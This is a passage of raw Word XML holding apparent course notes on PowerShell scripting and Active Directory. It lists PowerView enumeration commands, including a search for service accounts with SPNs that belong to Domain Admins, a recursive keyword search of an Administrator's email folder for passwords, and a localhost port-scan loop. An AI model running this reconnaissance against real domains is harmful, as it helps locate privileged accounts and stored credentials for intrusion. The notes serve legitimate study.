    <w:p w14:paraId="5CB47717" w14:textId="7825514A" w:rsidR="00A30F47" w:rsidRPr="0084205E" w:rsidRDefault="00A30F47" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>To determine the path of a task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AAC8549" w14:textId="6080B125" w:rsidR="00A30F47" w:rsidRPr="0084205E" w:rsidRDefault="00A30F47" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ScheduledTask</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>TaskName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> “Task Name”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4418CB4E" w14:textId="766F3790" w:rsidR="00A30F47" w:rsidRPr="0084205E" w:rsidRDefault="00A30F47" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>To determine owner of the C:\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B38939" w14:textId="168A6D41" w:rsidR="00A30F47" w:rsidRPr="0084205E" w:rsidRDefault="00A30F47" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Get-ACL C:\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578E13C1" w14:textId="06CFF6DB" w:rsidR="000062B5" w:rsidRPr="0084205E" w:rsidRDefault="000062B5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>To get the name of the operating system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733DEE0C" w14:textId="29367D82" w:rsidR="000062B5" w:rsidRPr="0084205E" w:rsidRDefault="000062B5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>NetComputer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>fulldata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> | select </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>operatingsystem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2A799AA0" w14:textId="020AE4A0" w:rsidR="00011103" w:rsidRPr="0084205E" w:rsidRDefault="00011103" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>To get list of local groups on network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F182DF" w14:textId="0B8CF380" w:rsidR="00011103" w:rsidRPr="0084205E" w:rsidRDefault="00011103" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>NetGroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>GroupName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396634BD" w14:textId="6FD26972" w:rsidR="00011103" w:rsidRPr="0084205E" w:rsidRDefault="00011103" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">net </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>localgroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="762430AF" w14:textId="0CDE7D0A" w:rsidR="00011103" w:rsidRPr="0084205E" w:rsidRDefault="00011103" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>To check when a password was last set for a service’s user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6FA45A" w14:textId="60DCF0D0" w:rsidR="00011103" w:rsidRPr="0084205E" w:rsidRDefault="00011103" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ADUser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -identity &lt;service&gt; -properties *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170F424B" w14:textId="741FEBE3" w:rsidR="00011103" w:rsidRPr="0084205E" w:rsidRDefault="00011103" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>NetUser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>SPN  |</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> ?{$_.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>mem</w:t>
      </w:r>
      <w:r w:rsidR="00CE286A" w:rsidRPr="0084205E">
        <w:t>berof</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CE286A" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -match ‘Domain Admins’}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A960AC" w14:textId="271FA14E" w:rsidR="00CE286A" w:rsidRPr="0084205E" w:rsidRDefault="00CE286A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Check for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>PasswordLastSet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="088561E5" w14:textId="454712D0" w:rsidR="00A30F47" w:rsidRPr="0084205E" w:rsidRDefault="00A30F47" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Basic Scripting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A99F49" w14:textId="12EEA8E6" w:rsidR="00A30F47" w:rsidRPr="0084205E" w:rsidRDefault="00A30F47" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> ISE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D24BE8" w14:textId="650735F2" w:rsidR="00A30F47" w:rsidRPr="0084205E" w:rsidRDefault="00A30F47" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Scripts have .ps1 file extension</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60AD5FCD" w14:textId="36492D8A" w:rsidR="00A30F47" w:rsidRPr="0084205E" w:rsidRDefault="00A30F47" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>To create variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3064C8B2" w14:textId="21FE3099" w:rsidR="00A30F47" w:rsidRPr="0084205E" w:rsidRDefault="00A30F47" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>variable_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> = value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9B327A" w14:textId="65D994B8" w:rsidR="00A30F47" w:rsidRPr="0084205E" w:rsidRDefault="00A30F47" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>To iterate through all ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672B4A62" w14:textId="299C5970" w:rsidR="00A30F47" w:rsidRPr="0084205E" w:rsidRDefault="00A30F47" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Foreach(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>new_var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> in $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>existing_var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>){}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1FF7D3" w14:textId="072FC769" w:rsidR="00781678" w:rsidRPr="0084205E" w:rsidRDefault="00781678" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>To script to search for certain keywords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F32372E" w14:textId="49830694" w:rsidR="00781678" w:rsidRPr="0084205E" w:rsidRDefault="00781678" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>$Path = "C:\Users\Administrator\Desktop\Emails" – the target path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147B9A75" w14:textId="56A146DE" w:rsidR="00781678" w:rsidRPr="0084205E" w:rsidRDefault="00781678" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>PassFile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> = Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ChildItem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> $Path -Recurse | Select-String "Keyword"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E13D90" w14:textId="77777777" w:rsidR="00781678" w:rsidRPr="0084205E" w:rsidRDefault="00781678" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Echo $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>PassFile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="63D71DBD" w14:textId="4C4683AE" w:rsidR="00781678" w:rsidRPr="0084205E" w:rsidRDefault="00781678" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Passfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> is a created variable for the script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483693A3" w14:textId="0C034082" w:rsidR="00781678" w:rsidRPr="0084205E" w:rsidRDefault="00781678" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Intermediate Scripting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CE6EA0" w14:textId="419BEE70" w:rsidR="00781678" w:rsidRPr="0084205E" w:rsidRDefault="00781678" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Determine open ports within a given range</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385266C0" w14:textId="77777777" w:rsidR="00781678" w:rsidRPr="0084205E" w:rsidRDefault="00781678" w:rsidP="0084205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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>for(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>=130; $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> -le 140; $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>++){</w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    Test-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>NetConnection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> localhost -Port $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16170D97" w14:textId="23890C91" w:rsidR="00781678" w:rsidRPr="0084205E" w:rsidRDefault="00434A2E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>save to .ps1 file and run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB3EA85" w14:textId="01E8B8C9" w:rsidR="00434A2E" w:rsidRPr="0084205E" w:rsidRDefault="00434A2E" w:rsidP="0084205E">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DFEA663" w14:textId="418C797A" w:rsidR="00434A2E" w:rsidRPr="0084205E" w:rsidRDefault="00E96212" w:rsidP="0084205E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Active Directory Basics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451D0C5F" w14:textId="378B5F8E" w:rsidR="00E96212" w:rsidRPr="0084205E" w:rsidRDefault="00E96212" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Directory service for Windows Domain Networks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78DD942A" w14:textId="30BABB59" w:rsidR="00E96212" w:rsidRPr="0084205E" w:rsidRDefault="00E96212" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Collection of machines and servers connected inside of domains that are a collective part of a bigger forest of domains that make up the Active Directory network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B20EC4" w14:textId="43D3C964" w:rsidR="00E96212" w:rsidRPr="0084205E" w:rsidRDefault="00E96212" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Various pieces such as</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE1CAE9" w14:textId="22AC69EA" w:rsidR="00E96212" w:rsidRPr="0084205E" w:rsidRDefault="00E96212" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Domain Controllers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B67F8B2" w14:textId="06E30C43" w:rsidR="00E96212" w:rsidRPr="0084205E" w:rsidRDefault="00E96212" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Forests, Trees, Domains</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5A17B8" w14:textId="13A2EDFD" w:rsidR="00E96212" w:rsidRPr="0084205E" w:rsidRDefault="00E96212" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Users + Groups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C90C598" w14:textId="4471D291" w:rsidR="00E96212" w:rsidRPr="0084205E" w:rsidRDefault="00E96212" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
